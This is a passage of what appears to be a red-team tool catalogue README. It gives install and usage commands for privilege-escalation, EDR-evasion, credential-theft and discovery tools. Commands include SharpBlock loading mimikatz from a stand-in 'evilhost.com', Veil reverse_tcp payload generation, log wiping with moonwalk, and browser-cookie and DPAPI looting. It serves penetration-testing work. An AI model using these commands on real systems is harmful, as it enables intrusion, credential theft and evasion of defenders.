- MS16-016 : 'mrxdav.sys' WebDAV
- MS16-032 : Secondary Logon Handle
- MS16-034 : Windows Kernel-Mode Drivers EoP
- MS16-135 : Win32k Elevation of Privilege
- CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc

**Install: (PowerShell)** 

```powershell
# Git install
git clone https://github.com/rasta-mouse/Sherlock

# Load the PowerShell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1
```

**Usage: (PowerShell)** 

```powershell
# Run all functions
Find-AllVulns

# Run a specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)
Find-MS14058
```

![image](https://user-images.githubusercontent.com/100603074/210182250-b5e9a4c1-4d30-4591-b06b-7d58098c7fef.png)

*Image used from https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/*

### [🔙](#tool-list)[Watson](https://github.com/rasta-mouse/Watson)

Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for privilege escalation vulnerabilities.

Great for identifying missing patches and suggesting exploits that could be used to exploit known vulnerabilities in order to gain higher privileges on the system.

**Install:** 

Using [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/), open the [Watson project .sln](https://github.com/rasta-mouse/Watson), choose "Release", and build.

**Usage:** 

```bash
# Run all checks
Watson.exe
```

![image](https://user-images.githubusercontent.com/100603074/210182370-409be1ac-64f9-4a07-96bd-b0752d7609a2.png)

*Image text used from https://github.com/rasta-mouse/Watson#usage*

### [🔙](#tool-list)[ImpulsiveDLLHijack](https://github.com/knight0x07/ImpulsiveDLLHijack)

A C# based tool that automates the process of discovering and exploiting DLL hijacks in target binaries.
\n\nThe discovered Hijacked paths can be weaponized, during an engagement, to evade EDR's.\n\n**Install:** \n\n- **Procmon.exe**  -\u003e https://docs.microsoft.com/en-us/sysinternals/downloads/procmon\n- **Custom Confirmatory DLL's** :\n\t- These are DLL files which assist the tool to get the confirmation whether the DLL's are been successfully loaded from the identified hijack path \n\t- Compiled from the MalDLL project provided above (or use the precompiled binaries if you trust me!)\n\t- 32Bit dll name should be: maldll32.dll\n\t- 64Bit dll name should be: maldll64.dll\n\t- Install NuGet Package:** PeNet** -\u003e https://www.nuget.org/packages/PeNet/ (Prereq while compiling the ImpulsiveDLLHijack project)\n\n**Note: i \u0026 ii prerequisites should be placed in the ImpulsiveDLLHijacks.exe's directory itself.**\n\n- **Build and Setup Information:**\n\n\t- **ImpulsiveDLLHijack**\n\n\t\t- Clone the repository in Visual Studio\n\t\t- Once project is loaded in Visual Studio go to \"Project\" --\u003e \"Manage NuGet packages\"  --\u003e Browse for packages and install \"PeNet\" -\u003e https://www.nuget.org/packages/PeNet/\n\t\t- Build the project!\n\t\t- The ImpulsiveDLLHijack.exe will be inside the bin directory.\n\n\t- **And for Confirmatory DLL's:**\n\n\t\t- Clone the repository in Visual Studio\n\t\t- Build the project with x86 and x64\n\t\t- Rename x86 release as maldll32.dll and x64 release as maldll64.dll\n\n\t- **Setup:** Copy the Confirmatory DLL's (maldll32 \u0026 maldll64) in the ImpulsiveDLLHijack.exe directory \u0026 then execute ImpulsiveDLLHijack.exe :))\n\n*Install instructions from https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites*\n\n**Usage:** \n\n```bash\n# Help\nImpulsiveDLLHijack.exe -h\n\n# Look for vulnerabilities in an executable \nImpulsiveDLLHijack.exe -path BINARY_PATH\n```\n\nUsage examples can be found 
[here](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples).\n\n![image](https://user-images.githubusercontent.com/100603074/210267803-cefee62b-f16d-4768-81d0-9001ef1a2b98.png)\n\n*Image used from https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples*\n\n### [🔙](#tool-list)[ADFSDump](https://github.com/mandiant/ADFSDump)\n\nA C# tool to dump all sorts of goodies from AD FS.\n\nCreated by Doug Bienstock [@doughsec](https://twitter.com/doughsec) while at Mandiant FireEye.\n\nThis tool is designed to be run in conjunction with ADFSpoof. ADFSdump will output all of the information needed in order to generate security tokens using ADFSpoof.\n\n**Requirements:**\n\n- ADFSDump must be run under the user context of the AD FS service account. You can get this information by running a process listing on the AD FS server or from the output of the Get-ADFSProperties cmdlet. Only the AD FS service account has the permissions needed to access the configuration database. Not even a DA can access this.\n- ADFSDump assumes that the service is configured to use the Windows Internal Database (WID). Although it would be trivial to support an external SQL server, this feature does not exist right now.\n- ADFSDump must be run locally on an AD FS server, NOT an AD FS web application proxy. The WID can only be accessed locally via a named pipe.\n\n**Install: (Compile)** \n\nADFSDump was built against .NET 4.5 with Visual Studio 2017 Community Edition. Simply open up the project .sln, choose \"Release\", and build.\n\n**Usage: (Flags)** \n\n```bash\n# The Active Directory domain to target. Defaults to the current domain.\n/domain:\n\n# The Domain Controller to target. Defaults to the current DC.\n/server:\n\n# Switch. 
Toggle to disable outputting the DKM key.\n/nokey\n\n# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.\n/database\n```\n\n[Blog - Exploring the Golden SAML Attack Against ADFS](https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs)\n\n![image](https://user-images.githubusercontent.com/100603074/212204724-65da5505-3576-4e6d-91ab-989b96247182.png)\n\n*Image used from https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs*\n\n### [🔙](#tool-list)[BeRoot](https://github.com/AlessandroZ/BeRoot)\n\nBeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.\n\nThe goal of BeRoot is to only output potential privilege escalation opportunities and not a endpoint configuration assessment.\n\nThis project works on Windows, Linux and Mac OS.\n\n**Install: (Linux)** \n\n```bash\ngit clone https://github.com/AlessandroZ/BeRoot\ncd BeRoot/Linux/\n```\n\n**Install: (Windows)** \n\nA pre-compiled version of BeRoot can be found [here](https://github.com/AlessandroZ/BeRoot/releases).\n\n**Usage:** \n\n```bash\n# Run BeRoot\npython beroot.py\n\n# Run BeRoot with user password (If you know the password use it, you could get more results)\npython beroot.py --password super_strong_password\n```\n\nFurther information can be found here for:\n\n- [Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)\n- [Windows](https://github.com/AlessandroZ/BeRoot/tree/master/Windows)\n\n![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/4c84ffeb-1ffb-474a-b028-4c8fcc64deb6)\n\n*Image used from https://github.com/AlessandroZ/BeRoot*\n\nDefense Evasion\n====================\n\n### [🔙](#tool-list)[Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)\n\nA PowerShell v2.0+ compatible PowerShell command and script obfuscator. 
If a victim endpoint is able to execute PowerShell then this tool is great for creating heavily obfuscated scripts.\n\n**Install:** \n\n```bash\ngit clone https://github.com/danielbohannon/Invoke-Obfuscation.git\n```\n\n**Usage:** \n\n```bash\n# Import the module (from the cloned directory), then launch the interactive menu\nImport-Module ./Invoke-Obfuscation.psd1\nInvoke-Obfuscation\n```\n\n![image](https://user-images.githubusercontent.com/100603074/206557377-a522ab7a-5803-48b0-8f3e-d7d7b607e692.png)\n\n### [🔙](#tool-list)[Veil](https://github.com/Veil-Framework/Veil)\n\nVeil is a tool for generating metasploit payloads that bypass common anti-virus solutions.\n\nIt can be used to generate obfuscated shellcode, see the official [veil framework blog](https://www.veil-framework.com/) for more info.\n\n**Install: (Kali)** \n\n```bash\napt -y install veil\n/usr/share/veil/config/setup.sh --force --silent\n```\n\n**Install: (Git)** \n\n```bash\nsudo apt-get -y install git\ngit clone https://github.com/Veil-Framework/Veil.git\ncd Veil/\n./config/setup.sh --force --silent\n```\n\n**Usage:** \n\n```bash\n# List all payloads (--list-payloads) for the tool Ordnance (-t Ordnance)\n./Veil.py -t Ordnance --list-payloads\n\n# List all encoders (--list-encoders) for the tool Ordnance (-t Ordnance)\n./Veil.py -t Ordnance --list-encoders\n\n# Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234\n./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234\n\n# List all payloads (--list-payloads) for the tool Evasion (-t Evasion)\n./Veil.py -t Evasion --list-payloads\n\n# Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris\n./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris\n```\n\nVeil creators wrote a nice [blog post](https://www.veil-framework.com/veil-command-line-usage/) explaining further ordnance and evasion command line 
usage.\n\n![image](https://user-images.githubusercontent.com/100603074/210136422-6b17671f-8868-4747-a7fe-e75d36b99e61.png)\n\n### [🔙](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock)\n\nA method of bypassing EDR active protection DLLs by preventing entry point execution.\n\n**Features:**\n\n- Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.\n- Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.\n- Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike).\n- Implanted process is hidden to help evade scanners looking for hollowed processes.\n- Command line args are spoofed and implanted after process creation using a stealthy EDR detection method.\n- Patchless ETW bypass.\n- Blocks NtProtectVirtualMemory invocation when the callee is within the range of a blocked DLL's address space.\n\n**Install:** \n\nUse [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) to compile the SharpBlock binary.\n\nOpen the SharpBlock [project .sln](https://github.com/CCob/SharpBlock), choose \"Release\", and build.\n\n**Usage:** \n\n```bash\n# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL\nSharpBlock -e http://evilhost.com/mimikatz.bin -s c:\\windows\\system32\\notepad.exe -d \"Active Protection DLL for SylantStrike\" -a coffee\n\n# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL\nexecute-assembly SharpBlock.exe -e \\\\.\\pipe\\mimi -s c:\\windows\\system32\\notepad.exe -d \"Active Protection DLL for SylantStrike\" -a coffee\nupload_file /home/haxor/mimikatz.exe \\\\.\\pipe\\mimi\n```\n\nNice PenTestPartners blog post 
[here](https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/).\n\n![image](https://user-images.githubusercontent.com/100603074/210983524-d6ea4255-7c47-45bb-8b13-9f6240735b0e.png)\n\n*Image used from https://youtu.be/0W9wkamknfM*\n\n### [🔙](#tool-list)[Alcatraz](https://github.com/weak1337/Alcatraz)\n\nAlcatraz is a GUI x64 binary obfuscator that is able to obfuscate various PE files, including:\n\n- .exe\n- .dll\n- .sys\n\nSome supported obfuscation features include:\n\n- Obfuscation of immediate moves\n- Control flow flattening\n- ADD mutation\n- Entry-point obfuscation\n- Lea obfuscation\n\n**Install: (Requirements)** \n\nInstall vcpkg: https://vcpkg.io/en/getting-started.html\n\n```bash\nvcpkg.exe install asmjit:x64-windows\nvcpkg.exe install zydis:x64-windows\n```\n\n**Usage:** \n\nUsing the GUI to obfuscate a binary:\n\n1. Load a binary by clicking `file` in the top left corner.\n2. Add functions by expanding the `Functions` tree. (You can search by typing the name into the search bar at the top)\n3. Hit `compile` (**Note:** *Obfuscating lots of functions might take a few seconds*)\n\n![image](https://user-images.githubusercontent.com/100603074/211530410-12982326-8fff-4415-bdde-2ebf6db2ae6c.png)\n\n*Image used from https://github.com/weak1337/Alcatraz*\n\n### [🔙](#tool-list)[Mangle](https://github.com/optiv/Mangle)\n\nMangle is a tool that manipulates aspects of compiled executables (.exe or DLL). \n\nMangle can remove known Indicator of Compromise (IoC) strings and replace them with random characters, change the file by inflating its size to avoid EDRs, and can clone code-signing certs from legitimate files. \n\nIn doing so, Mangle helps loaders evade on-disk and in-memory scanners.\n\n**Install:** \n\nThe first step, as always, is to clone the repo. Before you compile Mangle, you'll need to install the dependencies. 
To install them, run the following commands:\n\n```bash\ngo get github.com/Binject/debug/pe\n```\n\nThen build it:\n\n```bash\ngit clone https://github.com/optiv/Mangle\ncd Mangle\ngo build Mangle.go\n```\n\n**Usage:** \n\n```bash\n  -C string\n        Path to the file containing the certificate you want to clone\n  -I string\n        Path to the original file\n  -M    Edit the PE file to strip out Go indicators\n  -O string\n        The new file name\n  -S int\n        How many MBs to increase the file by\n```\n\nFull usage information can be found [here](https://github.com/optiv/Mangle#usage).\n\n![image](https://user-images.githubusercontent.com/100603074/216736894-ce46ac43-52b8-42bd-9f03-5d7656a635ff.png)\n\n*Image used from https://github.com/optiv/Mangle*\n\n### [🔙](#tool-list)[AMSI Fail](http://amsi.fail/)\n\nAMSI.fail is a great website that can be used to generate obfuscated PowerShell snippets that break or disable AMSI for the current process. \n\nThe snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no two generated outputs share the same signatures.\n\nNice F-Secure blog explaining AMSI [here](https://blog.f-secure.com/hunting-for-amsi-bypasses/).\n\n![image](https://user-images.githubusercontent.com/100603074/217655078-919e9c98-4c78-4c2b-a695-3e1c4d3f1e65.png)\n\n*Image used from http://amsi.fail/*\n\n### [🔙](#tool-list)[ScareCrow](https://github.com/optiv/ScareCrow)\n\nScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). \n\nOnce the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory.\n\nWhen executed, ScareCrow will copy the bytes of the system DLLs stored on disk in `C:\\Windows\\System32\\`. 
These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDRs only hook these DLLs in memory, the on-disk copies remain unaltered.\n\nNice blogs for learning about techniques utilized by ScareCrow:\n\n- [Endpoint Detection and Response: How Hackers Have Evolved](https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved)\n- [EDR and Blending In: How Attackers Avoid Getting Caught](https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught)\n\n**Install:** \n\n*ScareCrow requires golang 1.16.1 or later to compile loaders.*\n\n```bash\n# Clone\ngit clone https://github.com/optiv/ScareCrow\ncd ScareCrow\n\n# Install dependencies\ngo get github.com/fatih/color\ngo get github.com/yeka/zip\ngo get github.com/josephspurrier/goversioninfo\n\n# Required system packages (install with your package manager):\n#   openssl\n#   osslsigncode\n#   mingw-w64\n\n# Build\ngo build ScareCrow.go\n```\n\n**Usage:** \n\n```\nUsage of ./ScareCrow:\n  -I string\n        Path to the raw 64-bit shellcode.\n  -Loader string\n        Sets the type of process that will sideload the malicious payload:\n        [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)\n        [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.\n        [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.\n        [*] excel - Loads into a hidden Excel process using a JScript loader.\n        [*] msiexec - Loads into MSIexec process using a JScript loader.\n        [*] wscript - Loads into WScript process using a JScript loader. (default \"binary\")\n  -O string\n        Name of output file (e.g. loader.js or loader.hta). 
If Loader is set to dll or binary this option is not required.\n  -configfile string\n        The path to a json based configuration file to generate custom file attributes. This will not use the default ones.\n  -console\n        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.\n...\n```\n\nFull usage information can be found [here](https://github.com/optiv/ScareCrow#loader).\n\n![image](https://user-images.githubusercontent.com/100603074/220959052-029eac69-0b38-40d5-bc1a-7e90b0c93726.png)\n\n*Image used from https://github.com/optiv/ScareCrow*\n\n### [🔙](#tool-list)[moonwalk](https://github.com/mufeedvh/moonwalk)\n\nmoonwalk is a 400 KB single-binary executable that can clear your traces while penetration testing a Unix machine. \n\nIt saves the state of system logs pre-exploitation and reverts to that state, including filesystem timestamps, post-exploitation, leaving zero traces of a ghost in the shell.\n\n**Install:** \n\n```bash\ncurl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk\n```\n\n**Usage:** \n\n```bash\n# Start moonwalk straight after getting a shell on the victim Linux endpoint\ncurl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk\nchmod +x moonwalk\nmoonwalk start\n\n# Once you are finished, clear your traces \nmoonwalk finish\n```\n\n![image](https://user-images.githubusercontent.com/100603074/220959174-9c72922f-40cc-4843-bdc8-353cc55a3c51.png)\n\n*Image used from https://github.com/mufeedvh/moonwalk*\n\nCredential Access\n====================\n\n### [🔙](#tool-list)[Mimikatz](https://github.com/gentilkiwi/mimikatz)\n\nGreat tool for gaining access to hashed and cleartext passwords on a victim's endpoint. Once you have gained privileged access to a system, drop this tool to collect some creds.\n\n**Install:** \n\n1. 
Download the [mimikatz_trunk.7z](https://github.com/gentilkiwi/mimikatz/releases) file.\n2. Once downloaded, the `mimikatz.exe` binary is in the `x64` folder.\n\n**Usage:** \n\n```bash\n.\\mimikatz.exe\nprivilege::debug\n```\n\n![image](https://user-images.githubusercontent.com/100603074/208253562-5c58d412-ed3e-4ab5-b8e7-11092852c3d0.png)\n\n### [🔙](#tool-list)[LaZagne](https://github.com/AlessandroZ/LaZagne)\n\nNice tool for extracting locally stored passwords from browsers, databases, games, mail, git, wifi, etc.\n\n**Install: (Binary)** \n\nYou can install the standalone binary from [here](https://github.com/AlessandroZ/LaZagne/releases/).\n\n**Usage:** \n\n```bash\n# Launch all modes\n.\\laZagne.exe all\n\n# Launch only a specific module\n.\\laZagne.exe browsers\n\n# Launch only a specific software script\n.\\laZagne.exe browsers -firefox\n```\n\n![image](https://user-images.githubusercontent.com/100603074/208253800-48f960db-d569-4d1a-b39f-d6c7643691e2.png)\n\n\n### [🔙](#tool-list)[hashcat](https://github.com/hashcat/hashcat)\n\nTool for cracking password hashes. 
Supports a large list of hashing algorithms (the full list can be found [here](https://hashcat.net/wiki/doku.php?id=example_hashes)).\n\n**Install: (Binary)** \n\nYou can install the standalone binary from [here](https://hashcat.net/hashcat/).\n\n**Usage:** \n\n```bash\n.\\hashcat.exe --help\n```\n\nNice hashcat command [cheatsheet](https://cheatsheet.haax.fr/passcracking-hashfiles/hashcat_cheatsheet/).\n\n![image](https://user-images.githubusercontent.com/100603074/208263419-94bf92c0-1c83-4366-a6c2-b6533fdcc521.png)\n\n### [🔙](#tool-list)[John the Ripper](https://github.com/openwall/john)\n\nAnother password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs and GPUs.\n\n**Install:** \n\n```bash\nsudo apt-get install john -y\n```\n\n**Usage:** \n\n```bash\njohn\n```\n\n![image](https://user-images.githubusercontent.com/100603074/208263690-8c2d1253-7261-47da-850d-ca5a8d98ca13.png)\n\n### [🔙](#tool-list)[SCOMDecrypt](https://github.com/nccgroup/SCOMDecrypt)\n\nThis tool is designed to retrieve and decrypt RunAs credentials stored within Microsoft System Center Operations Manager (SCOM) databases.\n\nNCC blog post - ['SCOMplicated? – Decrypting SCOM “RunAs” credentials'](https://research.nccgroup.com/2017/02/23/scomplicated-decrypting-scom-runas-credentials/)\n\n**Pre-requisites:** \n\nTo run the tool you will require administrative privileges on the SCOM server. 
You will also need to ensure that you have read access to the following registry key:\n\n```\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\MOMBins\n```\n\nYou can check manually that you can see the database by gathering the connection details from the following keys:\n\n```\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\Database\\DatabaseServerName\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\Database\\DatabaseName\n```\n\n**Install: (PS1)** \n\n```\ngit clone https://github.com/nccgroup/SCOMDecrypt\ncd .\\SCOMDecrypt\\SCOMDecrypt\\\n. .\\Invoke-SCOMDecrypt.ps1\n```\n\n**Install: (Compile)** \n\nUsing [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) you can compile the SCOMDecrypt binary. \n\nOpen the SCOMDecrypt [project .sln](https://github.com/nccgroup/SCOMDecrypt), choose \"Release\", and build.\n\n**Usage:** \n\n```bash\n# PS1\nInvoke-SCOMDecrypt\n\n# Compiled C# binary\n.\\SCOMDecrypt.exe\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210456718-034ba080-602e-423e-8ac3-b62ef0841208.png)\n\n*Image text used from https://github.com/nccgroup/SCOMDecrypt*\n\n### [🔙](#tool-list)[nanodump](https://github.com/helpsystems/nanodump)\n\nThe LSASS (Local Security Authority Subsystem Service) is a system process in the Windows operating system that is responsible for enforcing the security policy on the system. 
It is responsible for a number of tasks related to security, including authenticating users for logon, enforcing security policies, and generating audit logs.\n\nCreating a dump of this process can allow an attacker to extract password hashes or other sensitive information from the process's memory, which could be used to compromise the system further.\n\nnanodump allows for the creation of a minidump of the LSASS process.\n\n**Install:** \n\n```bash\ngit clone https://github.com/helpsystems/nanodump.git\n```\n\n**Install: (Linux with MinGW)** \n\n```bash\nmake -f Makefile.mingw\n```\n\n**Install: (Windows with MSVC)** \n\n```bash\nnmake -f Makefile.msvc\n```\n\n**Install: (CobaltStrike only)**\n\nImport the `NanoDump.cna` script on Cobalt Strike.\n\nFull installation information can be found [here](https://github.com/helpsystems/nanodump).\n\n**Usage:** \n\n```bash\n# Run\nnanodump.x64.exe\n\n# Leverage the Silent Process Exit technique\nnanodump --silent-process-exit C:\\Windows\\Temp\\\n\n# Leverage the Shtinkering technique\nnanodump --shtinkering\n```\n\nFull usage information can be found [here](https://github.com/helpsystems/nanodump#1-usage).\n\n![nanodump](https://user-images.githubusercontent.com/100603074/210985548-a5e69f62-04da-4771-b06b-720147de08d0.jpg)\n\n*Image used from https://github.com/helpsystems/nanodump*\n\n### [🔙](#tool-list)[eviltree](https://github.com/t3l3machus/eviltree)\n\nA standalone python3 remake of the classic \"tree\" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches. Created for two main reasons:\n\n- While searching for secrets in files of nested directory structures, being able to visualize which files contain user provided keywords/regex patterns and where those files are located in the hierarchy of folders provides a significant advantage.\n- `tree` is an amazing tool for analyzing directory structures. 
It's really handy to have a standalone alternative to the command for post-exploitation enumeration, as it is not pre-installed on every Linux distro and is rather limited on Windows (compared to the UNIX version).\n\n**Install:** \n\n```bash\ngit clone https://github.com/t3l3machus/eviltree\n```\n\n**Usage:** \n\n```bash\n# Running a regex that essentially matches strings similar to: password = something against /var/www\npython3 eviltree.py -r /var/www -x \".{0,3}passw.{0,3}[=]{1}.{0,18}\" -v\n\n# Using comma separated keywords instead of regex\npython3 eviltree.py -r C:\\Users\\USERNAME -k passw,admin,account,login,user -L 3 -v\n```\n\n![image](https://user-images.githubusercontent.com/100603074/212204831-9887b976-dee8-4520-bbd6-e6e69da711ed.png)\n\n*Image used from https://github.com/t3l3machus/eviltree*\n\n### [🔙](#tool-list)[SeeYouCM-Thief](https://github.com/trustedsec/SeeYouCM-Thief)\n\nSimple tool to automatically download and parse configuration files from Cisco phone systems, searching for SSH credentials. 
\n\nWill also optionally enumerate Active Directory users from the UDS API.\n\n[Blog - Exploiting common misconfigurations in cisco phone systems](https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/)\n\n**Install:** \n\n```bash\ngit clone https://github.com/trustedsec/SeeYouCM-Thief\ncd SeeYouCM-Thief\npython3 -m pip install -r requirements.txt\n```\n\n**Usage:** \n\n```bash\n# Enumerate Active Directory users from the UDS api on the CUCM\n./thief.py -H \u003cCUCM server\u003e --userenum\n\n# Without specifying a phone IP address the script will attempt to download every config in the listing.\n./thief.py -H \u003cCisco CUCM Server\u003e [--verbose]\n\n# Parse the phone's web interface for the CUCM address and do a reverse lookup for other phones in the same subnet.\n./thief.py --phone \u003cCisco IP Phone\u003e [--verbose]\n\n# Specify a subnet to scan with reverse lookups.\n./thief.py --subnet \u003csubnet to scan\u003e [--verbose]\n```\n\n![image](https://user-images.githubusercontent.com/100603074/212204860-a20c83dd-a4f7-4c6f-a760-5925d4ae1e03.png)\n\n*Image used from https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/*\n\n### [🔙](#tool-list)[MailSniper](https://github.com/dafthack/MailSniper)\n\nMailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). 
It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.\n\nMailSniper also includes additional modules for password spraying, enumerating users and domains, gathering the Global Address List (GAL) from OWA and EWS and checking mailbox permissions for every Exchange user at an organization.\n\nNice blog post with more information [here](https://www.blackhillsinfosec.com/introducing-mailsniper-a-tool-for-searching-every-users-email-for-sensitive-data/).\n\n[MailSniper Field Manual](http://www.dafthack.com/files/MailSniper-Field-Manual.pdf)\n\n**Install:** \n\n```bash\ngit clone https://github.com/dafthack/MailSniper\ncd MailSniper\nImport-Module .\\MailSniper.ps1\n```\n\n**Usage:** \n\n```bash\n# Search the current user's mailbox\nInvoke-SelfSearch -Mailbox current-user@domain.com\n```\n\n![image](https://user-images.githubusercontent.com/100603074/217654320-3d74551c-e37a-4398-b354-a1ed7f982cd0.png)\n\n*Image used from https://patrowl.io/*\n\n### [🔙](#tool-list)[SharpChromium](https://github.com/djhohnstein/SharpChromium)\n\nSharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. 
Currently, it can extract:\n\n- Cookies (in JSON format)\n- History (with associated cookies for each history item)\n- Saved Logins\n\nThis rewrite has several advantages over previous implementations, which include:\n\n- No Type compilation or reflection required\n- Cookies are displayed in JSON format, for easy importing into Cookie Editor.\n- No downloading SQLite assemblies from remote resources.\n- Supports major Chromium browsers (but extendable to others)\n\n**Install:** \n\nUsing [Visual Studio Community Edition](https://visualstudio.microsoft.com/downloads/).\n\nOpen up the project .sln, choose \"release\", and build.\n\n**Usage:** \n\n```bash\n# Retrieve cookies associated with Google Docs and Github\n.\\SharpChromium.exe cookies docs.google.com github.com\n\n# Retrieve history items and their associated cookies.\n.\\SharpChromium.exe history\n\n# Retrieve saved logins (Note: Only displays those with non-empty passwords):\n.\\SharpChromium.exe logins\n```\n\n![image](https://user-images.githubusercontent.com/100603074/220959335-6e7a8275-bad9-4c3f-883f-2d7ab6749b75.png)\n\n*Image used from https://github.com/djhohnstein/SharpChromium*\n\n### [🔙](#tool-list)[dploot](https://github.com/zblurx/dploot)\n\nDPAPI (Data Protection Application Programming Interface) provides a set of APIs to encrypt and decrypt data where a user password is typically used to derive the 'master key' (in a user scenario). So to leverage DPAPI to gain access to certain data (Chrome Cookies/Login Data, the Windows Credential Manager/Vault etc) we just need access to a password.\n\ndploot is a Python rewrite of SharpDPAPI, written in C# by Harmj0y, which is itself a port of the DPAPI functionality from Mimikatz by gentilkiwi. 
It implements all the DPAPI logic of these tools, but this time it is usable with a python interpreter and from a Linux environment.\n\n[Blog - Operational Guidance for Offensive User DPAPI Abuse](https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107)\n\n**Install: (Pip)** \n\n```bash\npip install dploot\n```\n\n**Install: (Git)** \n\n```bash\ngit clone https://github.com/zblurx/dploot.git\ncd dploot\nmake\n```\n\n**Usage:** \n\n```bash\n# Loot decrypted machine private key files as a Windows local administrator \ndploot machinecertificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -quiet\n\n# Loot the DPAPI backup key as a Windows Domain Administrator (this allows an attacker to loot and decrypt any DPAPI protected password related to a domain user)\ndploot backupkey -d waza.local -u Administrator -p 'Password!123' 192.168.56.112 -quiet\n\n# Leverage the DPAPI backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints\ndploot certificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -pvk key.pvk  -quiet \n```\n\nDiscovery\n====================\n\n### [🔙](#tool-list)[PCredz](https://github.com/lgandx/PCredz)\n\nThis tool extracts credit card numbers, NTLM (DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.\n\n**Install:** \n\n```bash\ngit clone https://github.com/lgandx/PCredz\n```\n\n**Usage:** (PCAP File Folder) \n\n```bash\npython3 ./Pcredz -d /tmp/pcap-directory-to-parse/\n```\n\n**Usage:** (Live Capture) \n\n```bash\npython3 ./Pcredz -i eth0 -v\n```\n\n![image](https://user-images.githubusercontent.com/100603074/191007004-a0fd01f3-e01f-4bdb-b89e-887c85a7be91.png)\n\n### [🔙](#tool-list)[PingCastle](https://github.com/vletoux/pingcastle)\n\nPing Castle is a tool designed to quickly assess the Active Directory security level with a methodology based on 
risk assessment and a maturity framework. It does not aim at a perfect evaluation but rather at an efficiency compromise.\n\n**Install:** (Download) \n\n```\nhttps://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip\n```\n\n**Usage:** \n\n```bash\n./PingCastle.exe\n```\n\n![image](https://user-images.githubusercontent.com/100603074/191008405-39bab2dc-54ce-43d1-aed7-53956776a9ef.png)\n\n### [🔙](#tool-list)[Seatbelt](https://github.com/GhostPack/Seatbelt)\n\nSeatbelt is a useful tool for gathering detailed information about the security posture of a target Windows machine in order to identify potential vulnerabilities and attack vectors.\n\nIt is designed to be run on a compromised victim machine to gather information about the current security configuration, including information about installed software, services, group policies, and other security-related settings.\n\n**Install: (Compile)** \n\nSeatbelt has been built against .NET 3.5 and 4.0 with C# 8.0 features and is compatible with [Visual Studio Community Edition](https://visualstudio.microsoft.com/downloads/).\n\nOpen up the project .sln, choose \"release\", and build.\n\n**Usage:** \n\n```bash\n# Run all checks and output to output.txt\nSeatbelt.exe -group=all -full \u003e 